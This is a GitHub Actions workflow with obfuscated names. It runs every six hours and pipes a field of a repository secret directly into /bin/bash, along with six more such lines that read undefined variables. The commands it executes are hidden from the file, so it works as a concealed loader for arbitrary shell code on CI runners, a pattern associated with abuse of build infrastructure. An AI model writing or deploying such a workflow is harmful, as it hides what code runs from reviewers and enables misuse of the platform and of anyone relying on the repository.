name: ckajx
on:
  workflow_dispatch:
  schedule:
    - cron: '24 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ckajx
        env:
          wivp660: ${{ secrets.wivp660 }}
        run: |
          echo $wivp660 | jq -r .bg03 | /bin/bash
          echo $yugt8710 | jq -r .gcxg898 | /bin/bash
          echo $qjcgc63800 | jq -r .c4393 | /bin/bash
          echo $hczk7953 | jq -r .lsq3 | /bin/bash
          echo $qam74053 | jq -r .ia6436 | /bin/bash
          echo $iz77 | jq -r .z4779 | /bin/bash
          echo $ooqa8 | jq -r .i6668 | /bin/bash

